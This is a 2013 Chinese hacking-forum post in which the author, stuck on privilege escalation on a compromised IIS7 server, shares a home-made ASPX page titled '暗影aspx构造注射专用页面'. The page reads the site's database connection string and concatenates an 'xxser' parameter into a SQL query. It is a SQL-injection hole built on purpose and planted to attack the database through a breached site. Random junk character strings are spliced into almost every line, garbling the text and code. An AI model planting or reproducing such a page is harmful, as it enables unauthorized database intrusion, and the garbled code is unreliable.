昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
' [( [- r, G* v' h! v* q8 z其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
3 a8 _! m# w; Z- k3 C, H代码量不多,自己写个拉倒了。烦死了。
3 H0 z9 J3 x6 }6 I6 i8 Z( z
$ Z$ e4 z( ]# v' o) m$ v0 O6 F7 V; F1 Q o
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
1 h1 P C c; ]* |$ F5 r<html xmlns="http://www.w3.org/1999/xhtml">
& f7 I& o, O3 ^; h; X4 O<head runat="server">
/ c1 m% c+ @' E" B <title>暗影aspx构造注射专用页面</title>
9 R: s$ Y3 R/ n% ~, E- |% Z</head>
8 w' s) H0 p4 O<body>
/ w# E. Q. F7 m$ L3 e% [' H <form id="form1" runat="server">
0 ?. M" g* u& W3 R7 [, G' S8 \; G <div>
8 ]5 D* {: ~+ b8 f9 s: U+ {8 `, n <script language="c#" runat="server">% R" G1 e8 k6 a5 T- h
2 V0 T3 a: R4 f3 l0 F void page_init(object sender, EventArgs e)
. l8 a: m. j1 { {" J8 p! h2 L' N" [' |
& j( n. a9 h4 v System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();- E: x/ \% O$ Q# b! i
; L& s: B/ d) i/ ]& s( \
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
7 _; \) M1 P, O conn.Open();4 g- ^( T$ }9 c- {8 h0 k+ J
; ~2 w+ C! ?' Y: E$ F- P2 N( ~ string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=16 {% H+ O2 H. O, L
. C C3 ?) j) q$ v System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
9 V3 v7 K+ I! {; P8 i" [" \1 O int x = command.ExecuteNonQuery();( q. G/ ]9 i" h
Response.Write(i+"\n");
7 M0 b% f3 _# W1 R6 e; ]9 ] Response.Write(x);2 C% t4 w7 y+ d
conn.Close();7 p; ]1 [8 ~+ F' F1 c
}
) i# n5 m1 T$ y6 b6 k/ u4 z r4 U: l# y: r8 E
</script>
& I! t4 e$ S- ? </div>3 _! h+ z5 x; |/ D: [
</form>
5 m# F. A/ i) Q2 ~ N$ ]: Z</body>
6 ^8 T8 j$ P; A7 V</html>
. f) q/ G/ i5 G5 Y; b |
发表于 2013-3-20 21:32:01
收藏
支持
反对